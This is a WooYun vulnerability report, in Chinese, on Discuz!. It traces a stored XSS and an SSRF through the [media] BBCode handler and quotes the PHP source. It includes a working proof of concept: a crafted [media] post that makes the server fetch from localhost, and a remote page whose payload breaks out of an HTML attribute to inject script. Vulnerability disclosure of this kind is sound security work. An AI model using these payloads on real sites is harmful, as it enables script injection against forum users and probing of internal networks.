当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150674

漏洞标题: discuz!有条件存储型xss和ssrf(条件很容易达到)

相关厂商:Discuz!

漏洞作者: Jannock

提交时间:2015-10-30 17:31

修复时间:2016-02-02 17:40

公开时间:2016-02-02 17:40

漏洞类型:XSS跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-29: 细节向核心白帽子及相关领域专家公开
2016-01-08: 细节向普通白帽子公开
2016-01-18: 细节向实习白帽子公开
2016-02-02: 细节向公众公开

简要描述:

先提交个鸡肋的。。。其实条件很容易达到。

详细说明:

文件
source\function\function_discuzcode.php
function discuzcode 中

if(!defined('IN_MOBILE')) {
if(strpos($msglower, '[/media]') !== FALSE) {
$message = preg_replace("/\[media=([\w,]+)\]\s*([^\[\<\r\n]+?)\s*\[\/media\]/ies", $allowmediacode ? "parsemedia('\\1', '\\2')" : "bbcodeurl('\\2', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);
}


跟踪 parsemedia

function parsemedia($params, $url) {
$params = explode(',', $params);
$width = intval($params[1]) > 800 ? 800 : intval($params[1]);
$height = intval($params[2]) > 600 ? 600 : intval($params[2]);
$url = addslashes($url);
if(!in_array(strtolower(substr($url, 0, 6)), array('http:/', 'https:', 'ftp://', 'rtsp:/', 'mms://')) && !preg_match('/^static\//', $url) && !preg_match('/^data\//', $url)) {
return dhtmlspecialchars($url);
}
if($flv = parseflv($url, $width, $height)) {
return $flv;
}


跟踪 parseflv

function parseflv($url, $width = 0, $height = 0) {
$lowerurl = strtolower($url);
$flv = $iframe = $imgurl = '';
if($lowerurl != str_replace(array('player.youku.com/player.php/sid/','tudou.com/v/','player.ku6.com/refer/'), '', $lowerurl)) {
$flv = $url;
} elseif(strpos($lowerurl, 'v.youku.com/v_show/') !== FALSE) {
$ctx = stream_context_create(array('http' => array('timeout' => 10)));
if(preg_match("/http:\/\/v.youku.com\/v_show\/id_([^\/]+)(.html|)/i", $url, $matches)) {
$flv = 'http://player.youku.com/player.php/sid/'.$matches[1].'/v.swf';
$iframe = 'http://player.youku.com/embed/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.youku.com/player/getPlayList/VideoIDS/'.$matches[1];
$str = stripslashes(file_get_contents($api, false, $ctx));
if(!empty($str) && preg_match("/\"logo\":\"(.+?)\"/i", $str, $image)) {
$url = substr($image[1], 0, strrpos($image[1], '/')+1);
$filename = substr($image[1], strrpos($image[1], '/')+2);
$imgurl = $url.'0'.$filename;
}
}
}
} elseif(strpos($lowerurl, 'tudou.com/programs/view/') !== FALSE) {
if(preg_match("/http:\/\/(www.)?tudou.com\/programs\/view\/([^\/]+)/i", $url, $matches)) {
$flv = 'http://www.tudou.com/v/'.$matches[2];
$iframe = 'http://www.tudou.com/programs/view/html5embed.action?code='.$matches[2];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/<span class=\"s_pic\">(.+?)<\/span>/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.ku6.com/show/') !== FALSE) {
if(preg_match("/http:\/\/v.ku6.com\/show\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
if(!$width && !$height) {
$api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.ku6.com/special/show_') !== FALSE) {
if(preg_match("/http:\/\/v.ku6.com\/special\/show_\d+\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.ku6.com/refer/'.$matches[1].'/v.swf';
if(!$width && !$height) {
$api = 'http://vo.ku6.com/fetchVideo4Player/1/'.$matches[1].'.html';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"picpath\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'www.youtube.com/watch?') !== FALSE) {
if(preg_match("/http:\/\/www.youtube.com\/watch\?v=([^\/&]+)&?/i", $url, $matches)) {
$flv = 'http://www.youtube.com/v/'.$matches[1].'&hl=zh_CN&fs=1';
$iframe = 'http://www.youtube.com/embed/'.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/'VIDEO_HQ_THUMB':\s'(.+?)'/i", $str, $image)) {
$url = substr($image[1], 0, strrpos($image[1], '/')+1);
$filename = substr($image[1], strrpos($image[1], '/')+3);
$imgurl = $url.$filename;
}
}
}
} elseif(strpos($lowerurl, 'tv.mofile.com/') !== FALSE) {
if(preg_match("/http:\/\/tv.mofile.com\/([^\/]+)/i", $url, $matches)) {
$flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'v.mofile.com/show/') !== FALSE) {
if(preg_match("/http:\/\/v.mofile.com\/show\/([^\/]+).shtml/i", $url, $matches)) {
$flv = 'http://tv.mofile.com/cn/xplayer.swf?v='.$matches[1];
if(!$width && !$height) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/thumbpath=\"(.+?)\";/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
} elseif(strpos($lowerurl, 'video.sina.com.cn/v/b/') !== FALSE) {
if(preg_match("/http:\/\/video.sina.com.cn\/v\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
$flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
if(!$width && !$height) {
$api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
$str = file_get_contents($api, false, $ctx);
if(!empty($str)) {
$imgurl = str_replace('imgurl=', '', trim($str));
}
}
}
} elseif(strpos($lowerurl, 'you.video.sina.com.cn/b/') !== FALSE) {
if(preg_match("/http:\/\/you.video.sina.com.cn\/b\/(\d+)-(\d+).html/i", $url, $matches)) {
$flv = 'http://vhead.blog.sina.com.cn/player/outer_player.swf?vid='.$matches[1];
if(!$width && !$height) {
$api = 'http://interface.video.sina.com.cn/interface/common/getVideoImage.php?vid='.$matches[1];
$str = file_get_contents($api, false, $ctx);
if(!empty($str)) {
$imgurl = str_replace('imgurl=', '', trim($str));
}
}
}
} elseif(strpos($lowerurl, 'http://my.tv.sohu.com/u/') !== FALSE) {
if(preg_match("/http:\/\/my.tv.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
$flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'http://v.blog.sohu.com/u/') !== FALSE) {
if(preg_match("/http:\/\/v.blog.sohu.com\/u\/[^\/]+\/(\d+)/i", $url, $matches)) {
$flv = 'http://v.blog.sohu.com/fo/v4/'.$matches[1];
if(!$width && !$height) {
$api = 'http://v.blog.sohu.com/videinfo.jhtml?m=view&id='.$matches[1].'&outType=3';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"cutCoverURL\":\"(.+?)\"/i", $str, $image)) {
$imgurl = str_replace(array('\u003a', '\u002e'), array(':', '.'), $image[1]);
}
}
}
} elseif(strpos($lowerurl, 'http://www.ouou.com/fun_funview') !== FALSE) {
$str = file_get_contents($url, false, $ctx);
if(!empty($str) && preg_match("/var\sflv\s=\s'(.+?)';/i", $str, $matches)) {
$flv = $_G['style']['imgdir'].'/flvplayer.swf?&autostart=true&file='.urlencode($matches[1]);
if(!$width && !$height && preg_match("/var\simga=\s'(.+?)';/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
} elseif(strpos($lowerurl, 'http://www.56.com') !== FALSE) {
if(preg_match("/http:\/\/www.56.com\/\S+\/play_album-aid-(\d+)_vid-(.+?).html/i", $url, $matches)) {
$flv = 'http://player.56.com/v_'.$matches[2].'.swf';
$matches[1] = $matches[2];
} elseif(preg_match("/http:\/\/www.56.com\/\S+\/([^\/]+).html/i", $url, $matches)) {
$flv = 'http://player.56.com/'.$matches[1].'.swf';
}
if(!$width && !$height && !empty($matches[1])) {
$api = 'http://vxml.56.com/json/'.str_replace('v_', '', $matches[1]).'/?src=out';
$str = file_get_contents($api, false, $ctx);
if(!empty($str) && preg_match("/\"img\":\"(.+?)\"/i", $str, $image)) {
$imgurl = trim($image[1]);
}
}
}
if($flv) {
if(!$width && !$height) {
return array('flv' => $flv, 'imgurl' => $imgurl);
} else {
$width = addslashes($width);
$height = addslashes($height);
$flv = addslashes($flv);
$iframe = addslashes($iframe);
$randomid = 'flv_'.random(3);
$enablemobile = $iframe ? 'mobileplayer() ? "<iframe height=\''.$height.'\' width=\''.$width.'\' src=\''.$iframe.'\' frameborder=0 allowfullscreen></iframe>" : ' : '';
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=('.$enablemobile.'AC_FL_RunContent(\'width\', \''.$width.'\', \'height\', \''.$height.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.$flv.'\', \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\'));</script>';
}
} else {
return FALSE;
}
}


可以看出多处使用 file_get_contents
url可控,从而存在ssrf
并且结果可以,返回 imgurl=
用于
source\function\function_followcode.php

function fmakeflv($flv) {
$randomid = 'video_'.random(3);
$flv = is_array($flv) ? $flv : array('flv' => $flv);
if(!empty($flv['imgurl'])) {
$html = '<table class="mtm" title="'.lang('space', 'follow_click_play').'" onclick="javascript:showFlash(\'flash\', \''.$flv['flv'].'\', this, \''.$randomid.'\');"><tr><td class="vdtn hm" style="background: url('.$flv['imgurl'].') no-repeat; border: 1px solid #CDCDCD; cursor: pointer; height: 95px; width: 126px;"><img src="'.IMGDIR.'/vds.png" alt="'.lang('space', 'follow_click_play').'" /> </td></tr></table>';
} else {
$html = '<img src="'.IMGDIR.'/vd.gif" alt="'.lang('space', 'follow_click_play').'" onclick="javascript:showFlash(\'flash\', \''.$flv['flv'].'\', this, \''.$randomid.'\');" class="tn" style="cursor: pointer;" />';
}
return fcodedisp($html, 'video');
}


限制:
xss需要后台开启广播功能。
ssrf需要 允许使用 [audio] [media] [flash] 等多媒体代码
旧版本好像默认开启,新版默认关闭,不过后来开启的较多。

漏洞证明:

发贴(注:需工具提交,不然http://tudou.com 被转为[url]http://tudou.com )

[media=0,0]http://127.0.0.1:8080/s.php?http://tudou.com/programs/view/aaaa[/media]


http://127.0.0.1:8080/s.php
内容为:

<span class="s_pic">http://www.hao123.com/logo.gif');">aa</a><script>alert('a');</script><a a="</span>


1.png


3.png


<div class="flw_video"><ul><li><table class="mtm" title="点击播放" onclick="javascript:showFlash('flash', 'http://www.tudou.com/v/aaaa', this, 'video_vGq');"><tr><td class="vdtn hm" style="background: url(http://www.hao123.com/logo.gif');">aa</a><script>alert('a');</script><a a=") no-repeat; border: 1px solid #CDCDCD; cursor: pointer; height: 95px; width: 126px;"><img src="static/image/common/vds.png" alt="点击播放" /> </td></tr></table>


ssrf 可能shell内网
WooYun: 百度某个从SSRF到内网WebShell之2

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-02 17:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无